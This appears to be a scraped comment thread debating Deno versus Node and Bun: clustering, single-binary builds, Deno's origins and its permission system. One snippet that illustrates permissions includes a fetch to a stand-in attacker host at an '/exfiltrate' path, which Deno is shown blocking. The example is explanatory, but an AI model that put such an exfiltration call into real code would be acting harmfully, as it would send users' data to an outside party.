So you may not be wrong at all in your criteria. Subjective human communication can be more effective than objective communication sometimes ;). It just works at a different level.
Are there any libraries or frameworks to facilitate writing code that accesses things like the filesystem and network, but also works in Node, Deno, and Bun (bunodeno)?
I have a Deno app in production and it is working just fine. However, I still think Node is superior when you self-host and are not using Docker. Deno AFAIK still doesn't support any way of running one process for every CPU like the cluster module in Node.js.
I like to run my shit on the metal and without Docker and it feels like Deno was designed to run on Docker or some other kind of virtual containerized environment.
However, you can run it on Node thanks to pm2, but then I guess: why even run on Deno in the first place?
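For contrast, here's a rough sketch of the Node.js cluster pattern being referred to (the port number is arbitrary):

```ts
import cluster from "node:cluster";
import { cpus } from "node:os";
import http from "node:http";

if (cluster.isPrimary) {
  // Fork one worker per CPU core; the primary process only supervises.
  for (let i = 0; i < cpus().length; i++) cluster.fork();
  cluster.on("exit", () => cluster.fork()); // naive restart on crash
} else {
  // All workers share the same port; incoming connections are distributed.
  http
    .createServer((_req, res) => res.end(`handled by pid ${process.pid}\n`))
    .listen(3000);
}
```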
OTOH Deno can produce self-contained binaries. For me this is a plus, it makes distribution so much easier. I don't care if it's 100MB, I just want to have one file which I can throw on my server.
To be fair to the original commenter I believe they were making a Mean Girls (2004) reference. The line in question is "Stop trying to make fetch happen. It's not going to happen.". Likely just a funny quip and nothing serious :)
Yes, and that’s actually the problem with the comment. HN guidelines are for substantive discussions, not funny quips. There’s a few HN comment guidelines [1] that could apply here, but the most directly applicable one is “Omit internet tropes.”
It's both a throwaway quip, and a real sentiment: I think that Deno is not getting any traction, surely not the intended traction expected when it was created (and by Node's creator no less), and it will just keep hanging on in the fringe.
Besides, it wouldn't hurt HN to loosen up a little once in a while. You know, obsessive total adherence to rules is never a good thing - even to the law.
Interestingly, Deno and Node were both originally developed by the same person, Ryan Dahl.
Why did he feel the need to build a competitor to his own product? Whatever features are supposed to make Deno "better" than Node...why didn't he just work on integrating them into Node?
I understand that sometimes changes to software can be infeasible, especially if they are large fundamental/foundational changes, but this is still a bit of a head scratcher to me.
Not all software is shipped using containers. For example, with Deno, you can compile your application into a single executable binary. By having permissions built into the runtime, this means you can import a third-party package but only allow network requests to go to specific URLs; this way, even if malicious code is referenced in the app, it can't phone home.
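As a sketch of what that looks like in practice (the hostnames are made up), you grant network access only to the hosts you trust when starting the process:

```ts
// Run with: deno run --allow-net=api.example.com --no-prompt main.ts

// Requests to the allow-listed host go through...
const ok = await fetch("https://api.example.com/health");
console.log("allowed:", ok.status);

// ...while anything else is rejected by the permission system
// (with --no-prompt it throws instead of asking interactively).
try {
  await fetch("https://attacker.example.net/exfiltrate");
} catch (err) {
  console.error("blocked:", (err as Error).message);
}
```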
Why? `--allow-all` is the epitome of trivial. You can even wrap the deno executable in a script that passes that to it every time if that's what you really need.
[1] https://slint.dev
Edit to my comment at the top: I got excited a bit too early. The WebGPU feature doesn't include the API to launch a window. One still needs to rely on an extra library binary.